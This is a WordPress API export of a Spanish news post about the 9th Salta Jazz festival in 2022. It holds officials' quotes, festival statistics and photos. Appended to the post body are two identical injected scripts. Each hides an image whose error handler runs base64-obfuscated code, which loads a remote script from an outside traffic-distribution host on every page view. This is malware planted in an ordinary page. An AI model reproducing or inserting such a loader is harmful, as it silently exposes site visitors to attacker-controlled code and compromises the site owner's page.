{"id":1671,"date":"2022-10-24T19:25:43","date_gmt":"2022-10-24T22:25:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1671"},"modified":"2025-08-14T00:32:18","modified_gmt":"2025-08-14T03:32:18","slug":"los-vecinos-y-turistas-disfrutaron-de-la-9-edicion-de-salta-jazz-2022","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1671","title":{"rendered":"Los vecinos y turistas disfrutaron de la 9\u00b0 edici\u00f3n de Salta Jazz 2022"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#810826\"><strong><em>Con gran respuesta por parte del p\u00fablico, este fin de semana se cerr\u00f3 una nueva edici\u00f3n del festival que re\u00fane, en distintos escenarios, reconocidos artistas locales y nacionales.<\/em><\/strong><\/h4>\n\n\n\n<p>Este fin de semana, la Municipalidad de Salta acompa\u00f1\u00f3 a artistas del mundo del Jazz en una nueva edici\u00f3n del festival que re\u00fane a toda la familia.&nbsp;<\/p>\n\n\n\n<p>La propuesta de la Secretar\u00eda de Cultura y Turismo municipal, con entrada libre y gratuita, se vivi\u00f3 y disfruto en diferentes escenarios: el Teatro Provincial,&nbsp; Caf\u00e9 del Tiempo y el Paseo de los Poetas.<\/p>\n\n\n\n<p>\u00abEstamos muy contentos. Nosotros desde la municipalidad creemos que Salta&nbsp; est\u00e1 lista para recibir y generar muchos m\u00e1s festivales, tenemos una cantidad de artistas incre\u00edbles, una cantidad de m\u00fasicos impresionantes y la verdad que lo que m\u00e1s produce esta ciudad es m\u00fasica. Est\u00e1 bueno que en este festival los podamos escuchar y que sean ellos los protagonistas, nosotros estamos agradecidos de que se presten y quieran hacerlo todos los a\u00f1os\u00bb, expres\u00f3 la efe de gabinete, Agustina Gallo en el cierre de esta edici\u00f3n.<\/p>\n\n\n\n<p>Record\u00f3 los primeros a\u00f1os del Festival Salta Jazz, cuando reci\u00e9n comenzaba y se mostr\u00f3 contenta y agradecida por el crecimiento y respuesta de los vecinos \u00abla adopci\u00f3n que hizo la gente de este ritmo fue creciendo, el a\u00f1o que viene para los 10 a\u00f1os, ser\u00e1 un gran festejo y por supuesto. nosotros como Municipalidad vamos a apoyar a los artistas \u00ab.<\/p>\n\n\n\n<p>Por su parte, Martin Gorostiague, quien forma parte de la co-organizaci\u00f3n, destac\u00f3 que&nbsp; durante este nueve a\u00f1os se presentaron 72 agrupaciones locales de Salta, 22 agrupaciones nacionales, 4 agrupaciones internacionales, 1 presentaci\u00f2n de la OrquestaSinf\u00f2nica de Salta (Gershwin), 1 presentaci\u00f2n OSS + Escalandrum,&nbsp; 1 presentaci\u00f2n de la Orquesta Cuchi Leguizam\u00f2n,&nbsp; 3 exposiciones fotogr\u00e1ficas a cargo de Lidia Fern\u00e0ndez (Jazz), Argamonte (Orillas) y Carolina Vera ( Simplemente Jazz),&nbsp; 2 presentaciones de pintura\/happening en vivo de \u201cAll\u00e0Ellas\u201d ( Katz-Sanadrea-Montaldi-Buccianti).<\/p>\n\n\n\n<p>Los m\u00fasicos invitados dictaron 30 talleres\/workshops, donde asistieron 1128 m\u00fasicos y personas interesadas.<\/p>\n\n\n\n<p>Los eventos se realizaron en Vaqueros, Cachi, Cafayate, teniendo de base a Salta Capital y destacando la acci\u00f3n concreta del 2020, junto a la Municipalidad para poder realizar el Festival en contexto de pandemia y el compromiso de los m\u00fasicos en este tema.<\/p>\n\n\n\n<p>En tanto, el secretario de Cultura y Turismo,&nbsp; Ferando Garc\u00eda Soria se sum\u00f3 a los agradecimientos y remarc\u00f3, \u201cEs importante darle continuidad a este tipo de eventos para que la cultura de la ciudad siga creciendo. Es fundamental el apoyo y el acompa\u00f1amiento a producciones, a los m\u00fasicos y artistas locales. Sin lugar a dudas es mostrar la diversidad cultural&nbsp; que tiene la ciudad\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"1672\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-1024x678.jpg\" alt=\"\" class=\"wp-image-1672\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-1024x678.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-1536x1017.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-1068x707.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-1920x1272.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13-634x420.jpg 634w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-13.jpg 2041w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"1674\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-1024x678.jpg\" alt=\"\" class=\"wp-image-1674\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-1024x678.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-1536x1017.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-1068x707.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-1920x1272.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18-634x420.jpg 634w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-cierre-18.jpg 2041w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"1673\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-1024x678.jpg\" alt=\"\" class=\"wp-image-1673\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-1024x678.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-1536x1017.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-1068x707.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-1920x1272.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04-634x420.jpg 634w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/salta-jazz-dia-2-04.jpg 2041w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Esta 9na edici\u00f3n del Salta Jazz cont\u00f3 con la presencia de&nbsp; importantes artistas como: Ruido Blanco, Zammar, Pato Pacheco, Mar\u00eda P\u00eda Tob\u00edo, Daniela Zunino y la Orquesta Sinf\u00f3nica dirigida por Mart\u00edn Bonilla,&nbsp; Duende Flores &amp; Amigos, Ricardo Cavalli, Cheka &amp; The Walkings, Silencio Puro, Melina Imhorf y Matilde Paul.<\/p>\n\n\n\n<p>La particularidad de este a\u00f1o fue la realizaci\u00f3n de dos JamSessios y el tributo a las Mujeres del Jazz en el Teatro Provincial.<\/p>\n\n\n\n<p>En tanto, Martin Misa, director art\u00edstico del festival destac\u00f3 \u00abEstamos muy contentos con un festival que ya tiene su identidad y la gente va adoptando como propio. El apoyo de la Municipalidad es fundamental, tenemos una maquinaria muy aceitada y hay un apoyo tremendo a lo cultural. Que le hace muy bien a la gente\u00bb<\/p>\n\n\n\n<p>El director de la orquesta sinf\u00f3nica del festival Martin Bonilla, tambi\u00e9n, agradeci\u00f3 a todos por el trabajo de meses y el esfuerzo de cada equipo para obtener un espect\u00e1culo \u00ab100% local con un gran nivel, con un trabajo artesanal. El acompa\u00f1amiento de la Municipalidad en todo el festival, es muy importante y viene desde el principio. Hoy ante los resultados estamos muy felices\u00bb&nbsp;&nbsp;<\/p>\n\n\n\n<p>Finalmente, un espectador de los 3 d\u00edas, el profesor Jorge Relondi , resalt\u00f3 el trabajo de cada d\u00eda, \u00abcelebro el acompa\u00f1amiento a las expresiones culturales, es incre\u00edble que todos sean salte\u00f1os que todos sean artistas locales y esperemos que el a\u00f1o que viene vamos para arriba haya mucho m\u00e1s\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta Jazz 2022  9na edici\u00f3n Cierre\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/JgUY5ghaKO8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con gran respuesta por parte del p\u00fablico, este fin de semana se cerr\u00f3 una nueva edici\u00f3n del festival que re\u00fane, en distintos escenarios, reconocidos artistas locales y nacionales. Este fin de semana, la Municipalidad de Salta acompa\u00f1\u00f3 a artistas del mundo del Jazz en una nueva edici\u00f3n del festival que re\u00fane a toda la familia.&nbsp; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1674,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-1671","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1671"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1671"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1671\/revisions"}],"predecessor-version":[{"id":7305,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1671\/revisions\/7305"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1674"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}